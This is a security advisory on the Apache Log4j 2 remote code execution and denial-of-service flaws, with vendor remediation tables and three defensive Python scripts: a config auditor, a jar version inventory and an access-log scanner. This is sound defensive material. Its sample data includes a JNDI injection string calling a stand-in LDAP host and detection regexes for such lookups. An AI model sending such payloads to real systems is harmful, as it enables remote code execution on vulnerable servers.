Apache Log4j 2 Vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 & CVE-2021-44832)

The Apache Software Foundation has released security advisories addressing Remote Code Execution vulnerabilities (CVE-2021-44228, CVE-2021-45046 & CVE-2021-44832) and a Denial of Service vulnerability (CVE-2021-45105) in Apache Log4j 2 that are being actively exploited in the wild.  A remote attacker could exploit these vulnerabilities to take control of an affected system.  Log4j is an open-source, Java-based logging utility widely used by enterprise applications and cloud services.  System administrators should apply the remediation steps below immediately.


Vulnerabilities

  • CVE-2021-44228, CVE-2021-45046 & CVE-2021-44832 (Remote Code Execution Vulnerability)

In Apache Log4j versions from 2 up to 2.14.1, the JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints.  An attacker who can control log messages or log message parameters can

    • execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.  From Log4j 2.15.0, this behavior has been disabled by default.

However, the fix in Apache Log4j 2.15.0 was incomplete in certain non-default configurations.  It could allow attackers with

    • control over Thread Context Map (MDC) input data, when the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), to craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments.  Log4j 2.16.0 fixes this issue by removing the message lookups feature.

A further finding is that Apache Log4j2 versions 2.0-beta7 through 2.17.0 are vulnerable to a remote code execution (RCE) attack where:

    • an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI, which can execute remote code.  This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.

  • CVE-2021-45105 (Denial of Service Vulnerability)

It was found that Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect against uncontrolled recursion from self-referential lookups.  This could

    • allow attackers with control over Thread Context Map (MDC) input data, when the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), to craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that terminates the process.  This is also known as a denial of service (DoS) attack.  This issue was fixed in Log4j 2.17.0, 2.12.3 and 2.3.1.
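As an added illustration (not part of the advisory, and not Apache's own tooling), the following Python script audits a Log4j 2 XML configuration for the two configuration-side conditions described above: a Pattern Layout that uses a Context Lookup such as $${ctx:loginId}, and a JDBC Appender whose DataSource names a JNDI URI outside the java: protocol. The configuration strings, the appender names, and the %X{loginId} converter used as the hardened replacement are constructed assumptions for this example, not taken from the advisory.

```python
"""Audit a Log4j 2 XML configuration for the settings the advisory names as risky."""
import re
import xml.etree.ElementTree as ET

# "${ctx:...}" or the escaped "$${ctx:...}" inside a layout pattern: a Thread Context
# Map (MDC) lookup that unpatched releases evaluate again for every log event
# (CVE-2021-45046, CVE-2021-45105).
CONTEXT_LOOKUP = re.compile(r"\$\$?\{ctx:")

# Constructed sample (not from any real deployment): a Console appender whose pattern
# interpolates MDC data, and a JDBC appender whose DataSource points at a non-java: JNDI name.
WEAK_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="WARN">
  <Appenders>
    <Console name="Console" target="SYSTEM_OUT">
      <PatternLayout pattern="%d %p %c{1.} [%t] user=$${ctx:loginId} %m%n"/>
    </Console>
    <JDBC name="Db" tableName="app_log">
      <DataSource jndiName="ldap://example.invalid:1389/ds"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="info">
      <AppenderRef ref="Console"/>
      <AppenderRef ref="Db"/>
    </Root>
  </Loggers>
</Configuration>
"""

# The same configuration with both findings resolved (assumed fix): MDC data rendered by
# the %X{key} pattern converter instead of a lookup, and the DataSource on a java: name,
# the only protocol that 2.17.1 / 2.12.4 / 2.3.2 still accept for JDBC data sources.
HARDENED_CONFIG = WEAK_CONFIG.replace(
    "user=$${ctx:loginId}", "user=%X{loginId}"
).replace(
    'jndiName="ldap://example.invalid:1389/ds"', 'jndiName="java:comp/env/jdbc/LogDS"'
)


def audit_config(xml_text):
    """Return a list of (finding, appender_name) tuples for a Log4j 2 XML config."""
    root = ET.fromstring(xml_text)
    findings = []
    appenders = root.find("Appenders")
    if appenders is None:
        return findings
    for appender in appenders:
        name = appender.get("name", "<unnamed>")
        # Any PatternLayout under this appender (direct or nested, e.g. inside a Routing appender)
        for layout in appender.iter("PatternLayout"):
            if CONTEXT_LOOKUP.search(layout.get("pattern", "")):
                findings.append(("context-lookup-in-pattern-layout", name))
        # JDBC appender whose JNDI DataSource is outside the java: protocol (CVE-2021-44832)
        if appender.tag == "JDBC":
            for source in appender.iter("DataSource"):
                if not source.get("jndiName", "").lower().startswith("java:"):
                    findings.append(("non-java-jndi-datasource", name))
    return findings


if __name__ == "__main__":
    for label, config in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_config(config) or "no findings")
```

Run against a real log4j2.xml by reading the file into audit_config(); properties, YAML and JSON configurations would need their own loader, and a finding on a system that is already on 2.17.1 / 2.12.4 / 2.3.2 is still worth fixing because it removes the condition rather than relying on the library to neutralise it.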


Severity Level

  • Critical


Affected Systems & Remediation


(1) Products confirmed affected:

Products / Affected Systems / Hotfix status / Remediation / Reference

Apache
  Affected Systems: All Apache Log4j Java Library versions from 2.0-alpha1 to 2.17.0.
  Hotfix status:    Log4j 2.17.1 is ready.
  Remediation:      Upgrade to Log4j 2.17.1 or apply the recommended mitigations immediately.
  Reference:        https://logging.apache.org/log4j/2.x/security.html

Java
  Affected Systems: JDK versions lower than 6u211, 7u201, 8u191, and 11.0.1.
  Hotfix status:    For Java 8 or later: Log4j 2.17.1 is ready.
                    For Java 7: Log4j 2.12.4 is ready.
                    For Java 6: Log4j 2.3.2 is ready.
  Remediation:      Java 8 (or later) should upgrade to release 2.17.1.
                    Java 7 should upgrade to release 2.12.4.
                    Java 6 should upgrade to release 2.3.2.
  Reference:        https://www.oracle.com/java/technologies/javase/products-doc-8u121-revision-builds-relnotes.html
                    Log4j – Download Apache Log4j 2

Palo Alto
  Affected Systems: PAN-OS 9.0, PAN-OS 9.1, and PAN-OS 10.0 versions for Panorama.
                    This issue is only applicable to Panorama hardware and virtual appliances that have run in Panorama Mode or Log Collector Mode as part of a Collector Group. You can determine whether the Panorama is part of a Collector Group by visiting ‘Panorama > Managed Collectors’ in the web interface.
  Hotfix status:    Fixes in PAN-OS 9.0.15, PAN-OS 9.1.12-h3, and PAN-OS 10.0.8-h8 are available.
  Remediation:      Please apply the fix immediately.
                    If Panorama is running an impacted version of PAN-OS and you are able to upgrade to PAN-OS 10.1, upgrade all appliances in affected Collector Groups to the latest PAN-OS 10.1 Preferred release (PAN-OS 10.1.3-h1 at time of publication) to remediate these issues.
                    NOTE: Downgrading to PAN-OS 10.0 or earlier PAN-OS versions is not currently supported once Panorama is upgraded to PAN-OS 10.1.
  Reference:        Palo Alto Networks Security Advisories:
                    https://security.paloaltonetworks.com/CVE-2021-44228
                    https://securityadvisories.paloaltonetworks.com

IBM SPSS
  Affected Systems: SPSS Statistics 24.0 or earlier: these versions are End of Service and are no longer supported.
  Hotfix status:    Not available (end of support).
  Remediation:      Please upgrade to a supported release, i.e. 25.0 or later. Please contact the ITSC Service Desk for the fixes.

  Affected Systems: SPSS Statistics 25.0 and later.
  Hotfix status:    Fixes for 25.0 and later are available.
  Remediation:      Please apply fixes immediately.

IBM WebSphere
  Affected Systems: WebSphere Application Server Liberty (Continuous delivery)
                    WebSphere Application Server version 9.0
                    WebSphere Application Server version 8.5
                    WebSphere Application Server version 8.0
                    WebSphere Application Server version 7.0
  Hotfix status:    Liberty: Fix Pack 22.0.0.1 is in development.
                    9.0: Fix Pack 9.0.5.11 is in development.
                    8.5: Fix Pack 8.5.5.21 is in development.
                    8.0: Fix Pack 8.0.0.15 is in development.
                    7.0: Fix Pack 7.0.0.45 is in development.
  Remediation:      Upgrade to the minimal fix pack levels required by the interim fix, then apply Interim Fix PH42762 first. Apply the Fix Packs when they are available.
  Reference:        https://www.ibm.com/support/pages/node/6525706

VMware
  Affected Systems: Multiple products.
  Hotfix status:    Fixes for some products are available; some products are still pending patches.
  Remediation:      Please apply fixes immediately. For products still pending patches, please implement the related ‘Workarounds’ first.
  Reference:        https://www.vmware.com/security/advisories/VMSA-2021-0028.html

RedHat
  Affected Systems: Some of the OpenShift and JBoss packages.
  Hotfix status:    Security errata for most affected platforms are released.
  Remediation:      Please apply the errata immediately.
  Reference:        https://access.redhat.com/security/cve/cve-2021-44228

Microsoft
  Affected Systems: Multiple products.
  Hotfix status:    Security Updates for some products are available in the Security Update Guide; some products are still pending an update patch.
  Remediation:      Please implement the updates immediately. For products still pending an update patch, please refer to the related ‘Additional Information’ link in their Security Update Guide entry.
  Reference:        Microsoft’s Response to CVE-2021-44228 Apache Log4j 2
                    https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/
                    CVE-2021-44228 – Security Update Guide – Microsoft – Apache Log4j Remote Code Execution Vulnerability
                    https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-44228

Citrix
  Affected Systems: Multiple products.
  Hotfix status:    Update patches are available.
  Remediation:      Please apply the related latest patch as soon as possible.
  Reference:        https://support.citrix.com/article/CTX335705
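Before an upgrade can be scheduled the affected copies of log4j-core have to be found, including those bundled inside war and ear archives. The Python script below is an added example (not part of the advisory or of any vendor's tooling) that walks a directory, reads the log4j-core version from each jar's Maven pom.properties (falling back to the file name), and reports whether it meets the fixed release the table above gives for the Java runtime in use: 2.17.1 for Java 8 or later, 2.12.4 for Java 7, 2.3.2 for Java 6. The sample jars and directory layout are constructed inside a temporary directory for the demonstration.

```python
"""Inventory log4j-core jars under a directory and compare them with the fixed releases."""
import io
import os
import re
import tempfile
import zipfile

# Fixed releases named in the advisory, keyed by Java major version:
# Java 6 -> 2.3.2, Java 7 -> 2.12.4, Java 8 or later -> 2.17.1.
FIXED_RELEASE = {6: (2, 3, 2), 7: (2, 12, 4)}
DEFAULT_FIXED = (2, 17, 1)
POM_SUFFIX = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JAR_NAME = re.compile(r"log4j-core-(\d[\w.\-]*)\.jar$")


def parse_version(text):
    """'2.17.1' -> (2, 17, 1); pre-release qualifiers such as '2.0-beta9' are dropped."""
    numbers = [int(p) for p in text.split("-")[0].split(".") if p.isdigit()]
    return tuple((numbers + [0, 0, 0])[:3])


def version_is_fixed(version, java_major):
    """True when the jar is at or above the fixed release for that Java runtime.

    Assumes the jar can actually run on that runtime: 2.3.x is the only line for
    Java 6 and 2.12.x the only line for Java 7, so the comparison is branch-safe there."""
    return parse_version(version) >= FIXED_RELEASE.get(java_major, DEFAULT_FIXED)


def log4j_core_version(archive):
    """Return the log4j-core version recorded in an open ZipFile, or None if absent."""
    for entry in archive.namelist():
        if entry.endswith(POM_SUFFIX):
            for line in archive.read(entry).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    return line.split("=", 1)[1].strip()
    return None


def scan_archive(archive, label, java_major, results):
    """Record log4j-core found in `archive` and in any jar nested inside it (war/ear)."""
    version = log4j_core_version(archive)
    if version is None:
        match = JAR_NAME.search(label)  # fall back to the file name when the pom is stripped
        if match:
            version = match.group(1)
    if version is not None:
        results[label] = (version, version_is_fixed(version, java_major))
    for entry in archive.namelist():
        if entry.lower().endswith(".jar"):
            with zipfile.ZipFile(io.BytesIO(archive.read(entry))) as nested:
                scan_archive(nested, f"{label}!{entry}", java_major, results)


def scan_tree(root_dir, java_major):
    """Walk root_dir; return {relative path: (version, fixed?)} for every log4j-core found."""
    results = {}
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith((".jar", ".war", ".ear")):
                continue
            path = os.path.join(dirpath, name)
            label = os.path.relpath(path, root_dir).replace(os.sep, "/")
            with zipfile.ZipFile(path) as archive:
                scan_archive(archive, label, java_major, results)
    return results


def _fake_log4j_core_jar(version):
    """Constructed sample: a jar carrying only log4j-core's pom.properties."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(POM_SUFFIX, f"groupId=org.apache.logging.log4j\n"
                                 f"artifactId=log4j-core\nversion={version}\n")
    return buf.getvalue()


def demo_scan(java_major=8):
    """Constructed sample tree: a loose 2.14.1 jar plus a war that bundles 2.17.1."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    os.makedirs(os.path.join(root, "lib"))
    with open(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), "wb") as fh:
        fh.write(_fake_log4j_core_jar("2.14.1"))
    with zipfile.ZipFile(os.path.join(root, "webapp.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", _fake_log4j_core_jar("2.17.1"))
    return scan_tree(root, java_major)


if __name__ == "__main__":
    for path, (version, fixed) in sorted(demo_scan().items()):
        print(f"{'OK     ' if fixed else 'UPGRADE'} {path}: log4j-core {version}")
```

Point scan_tree() at an application root with the Java major version that actually runs it; a jar that has been relocated or shaded into another artifact keeps its pom.properties path, which is why the script keys on that entry rather than on the file name alone.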


(2) Products still under evaluation:

Products Reference


(3) Products which can detect the vulnerability:

Products / Product version / Reference

Microsoft
  Product version: Microsoft Defender and other MS security solutions
  Reference:       Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation
                   https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/

Kaspersky
  Product version: Kaspersky Endpoint Security for Business
  Reference:       Kaspersky products protect against attacks leveraging the vulnerability under the following names:
                   UMIDS:Intrusion.Generic.CVE-2021-44228.
                   PDM:Exploit.Win32.Generic

Palo Alto
  Product version: Applications and Threats Content version 8502 released
  Reference:       Vulnerability Signatures ID: 91994, 91995, 92001

Fortinet
  Product version: FortiGate
  Reference:       Log4j2 Vulnerability | FortiGuard (https://www.fortiguard.com/outbreak-alert/log4j2-vulnerability)

Fortinet has additional research relating to Log4j. This blog discusses the vulnerability, what protections Fortinet has in place to protect our customers, and the work being done to ensure that Fortinet products are not susceptible to this vulnerability. This Threat Signal provides answers to some additional questions surrounding the vulnerability.
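Vendor signatures such as those listed above take time to deploy, so responders also want a first-pass check of their own logs. As an added example (not from the advisory or any of the vendors above), the Python scanner below parses web-server access lines in combined log format and flags Log4j lookup syntax in the request fields a remote party controls (request line, Referer, User-Agent). The log lines are constructed for the example; the patterns match only the plain `${jndi:` form and generic `${...}` lookups, so this complements rather than replaces the vendor detections.

```python
"""Flag Log4j lookup syntax in remotely supplied fields of web-server access logs."""
import re

# Constructed sample lines (combined log format). Lines 3 and 4 carry lookup syntax
# in the User-Agent field; the others are ordinary traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.8 - - [11/Dec/2021:10:01:05 +0000] "GET /api/items?id=42 HTTP/1.1" 200 88 "-" "curl/7.79.1"
198.51.100.9 - - [11/Dec/2021:10:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.invalid:1389/x}"
198.51.100.10 - - [11/Dec/2021:10:02:30 +0000] "POST /login HTTP/1.1" 302 0 "-" "x${ctx:loginId}y"
203.0.113.9 - - [11/Dec/2021:10:03:00 +0000] "GET /static/app.css HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "request" status size "referer" "agent"
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Fields an external client fully controls and which commonly end up in log messages.
UNTRUSTED_FIELDS = ("request", "referer", "agent")

# A JNDI lookup string is the indicator for CVE-2021-44228; any other lookup syntax in
# client-supplied data has no legitimate use and is worth a look (CVE-2021-45046/45105).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
ANY_LOOKUP = re.compile(r"\$\{[^}]*\}")


def classify(value):
    """Return 'critical', 'suspicious', or None for one untrusted field value."""
    if JNDI_LOOKUP.search(value):
        return "critical"
    if ANY_LOOKUP.search(value):
        return "suspicious"
    return None


def scan_access_log(text):
    """Parse access-log text and return one hit dict per flagged field."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = ACCESS_LINE.match(line)
        if not match:
            continue  # unparsable lines are skipped; a real deployment would count them
        for field in UNTRUSTED_FIELDS:
            severity = classify(match.group(field))
            if severity:
                hits.append({
                    "line": lineno,
                    "ip": match.group("ip"),
                    "time": match.group("time"),
                    "field": field,
                    "severity": severity,
                    "value": match.group(field),
                })
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"[{hit['severity']}] line {hit['line']} {hit['ip']} {hit['field']}={hit['value']!r}")
```

A hit on the web tier does not by itself mean the backend logged the value through Log4j; it tells the responder which source addresses and which application endpoints to check against the affected-version inventory and the vendor telemetry above.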


Reference


Enquiry


Published on: 11 Dec 2021

Last update on: 30 Dec 2021